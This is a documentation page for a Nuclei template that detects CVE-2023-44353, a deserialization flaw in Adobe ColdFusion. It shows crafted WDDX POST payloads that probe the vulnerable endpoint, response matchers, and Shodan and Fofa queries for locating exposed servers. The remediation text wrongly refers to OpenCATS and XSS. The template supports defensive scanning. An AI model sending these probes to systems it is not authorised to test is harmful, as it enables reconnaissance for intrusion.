Skip to content
Nuclei Templates

Adobe ColdFusion WDDX Deserialization Gadgets

ID: CVE-2023-44353

Severity: critical

Author: salts

Tags: cve2023,cve,adobe,coldfusion,deserialization,xss

Description

Section titled “Description”

Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.

YAML Source

Section titled “YAML Source”
id: CVE-2023-44353


info:
  name: Adobe ColdFusion WDDX Deserialization Gadgets
  author: salts
  severity: critical
  description: |
    Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.
  remediation: |
    To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-44353
    - https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html
    - https://research.nccgroup.com/2023/11/21/technical-advisory-adobe-coldfusion-wddx-deserialization-gadgets/#coldfusion-wddx.py
    - https://github.com/JC175/CVE-2023-44353-Nuclei-Template
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-44353
    cwe-id: CWE-502
    epss-score: 0.00412
    epss-percentile: 0.73869
    cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: adobe
    product: coldfusion
    shodan-query:
      - http.component:"Adobe ColdFusion"
      - http.component:"adobe coldfusion"
      - http.title:"coldfusion administrator login"
      - cpe:"cpe:2.3:a:adobe:coldfusion"
    fofa-query:
      - title="coldfusion administrator login"
      - app="adobe-coldfusion"
    google-query: intitle:"coldfusion administrator login"
  tags: cve2023,cve,adobe,coldfusion,deserialization,xss
variables:
  windows_known_path: "C:\\Windows\\"
  windows_bad_path: "C:\\Thisdefinitelydoesnotexist\\"
  linux_known_path: "/etc/"
  linux_bad_path: "/thesecretcowlevelisreal/"


http:
  - raw:
      - |
        POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_known_path}}</string></var></struct></data></wddxPacket>


      - |
        POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_bad_path}}</string></var></struct></data></wddxPacket>


      - |
        POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_known_path}}</string></var></struct></data></wddxPacket>


      - |
        POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_bad_path}}</string></var></struct></data></wddxPacket>


    matchers-condition: or
    matchers:
      - type: dsl
        name: windows
        dsl:
          - "status_code_1 == 500 && status_code_2 == 404"
          - contains(body_1, "coldfusion.runtime")
        condition: and


      - type: dsl
        name: linux
        dsl:
          - "status_code_3 == 500 && status_code_4 == 404"
          - contains(body_3, "coldfusion.runtime")
        condition: and
# digest: 490a00463044022020ec27e4cd495443ed68db88b43d41c6d6da32465336eff2d88e257d8b7257af022006fce0d3c1b71b1884815adfaf39212de8b0ea83eb691e9c6a21cfd375d581ab:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-44353.yaml"

View on Github